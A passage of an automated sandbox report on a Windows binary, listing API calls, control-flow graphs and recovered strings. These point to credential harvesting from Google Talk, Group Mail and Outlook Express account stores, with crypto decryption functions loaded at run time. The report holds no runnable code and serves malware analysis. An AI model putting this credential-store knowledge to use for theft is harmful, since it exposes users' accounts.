                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2012582556-3916222277

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004037EB
                                                                                                                  • memset.MSVCRT ref: 004037FF
                                                                                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  • strchr.MSVCRT ref: 0040386E
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                  • strlen.MSVCRT ref: 00403897
                                                                                                                  • sprintf.MSVCRT ref: 004038B7
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                  • String ID: %s@yahoo.com
                                                                                                                  • API String ID: 317221925-3288273942

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403504
                                                                                                                  • memset.MSVCRT ref: 0040351A
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                  • _mbscat.MSVCRT ref: 0040356D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                  • API String ID: 3071782539-966475738

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 365 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->365 366 40cd59-40cd60 DeleteObject 363->366 366->365
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                  • memset.MSVCRT ref: 0040CD96
                                                                                                                  • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2054149589-0

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 384 44b48d 375->384 385 44b428-44b433 GetProcAddress 375->385 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 386 44b471-44b474 383->386 388 44b48e-44b496 384->388 385->374 389 44b435-44b442 VirtualProtect 385->389 386->377 387 44b476-44b478 386->387 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->384 397->386
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                  • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                    • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                    • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                    • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  • memset.MSVCRT ref: 00408620
                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                  • memset.MSVCRT ref: 00408671
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                  Strings
                                                                                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                  • String ID: Software\Google\Google Talk\Accounts
                                                                                                                  • API String ID: 1366857005-1079885057

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 430 40baa0-40bab3 call 407e30 438 40bab5-40bac1 430->438 439 40bafa-40bb09 SetCursor 430->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->430 446->430 447->430 448->430 449->430
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                                                  • String ID: /nosort$/sort
                                                                                                                  • API String ID: 882979914-1578091866
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                    • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                    • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                    • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                    • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2099061454-0
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                  • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2152742572-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76270A60,?,00000000), ref: 00410D1C
                                                                                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                  • memset.MSVCRT ref: 00410E10
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                  • API String ID: 889583718-2036018995
                                                                                                                  APIs
                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3473537107-0
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004109F7
                                                                                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                    • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                  • memset.MSVCRT ref: 00410A32
                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3143880245-0
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 00406F4C
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`'v,00407A43,00000001,?,00000000,`'v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                  • free.MSVCRT ref: 00406F6D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                  • String ID: `'v
                                                                                                                  • API String ID: 3056473165-1951845285
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408D5C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408D7A
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408D98
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408DA8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1033339047-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                  • String ID: Arial
                                                                                                                  • API String ID: 3853255127-493054409
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_strcmpimemset
                                                                                                                  • String ID: /stext
                                                                                                                  • API String ID: 520177685-3817206916
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 145871493-0
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4165544737-0
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  APIs
                                                                                                                  • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumNamesResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3334572018-0
                                                                                                                  APIs
                                                                                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1863332320-0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
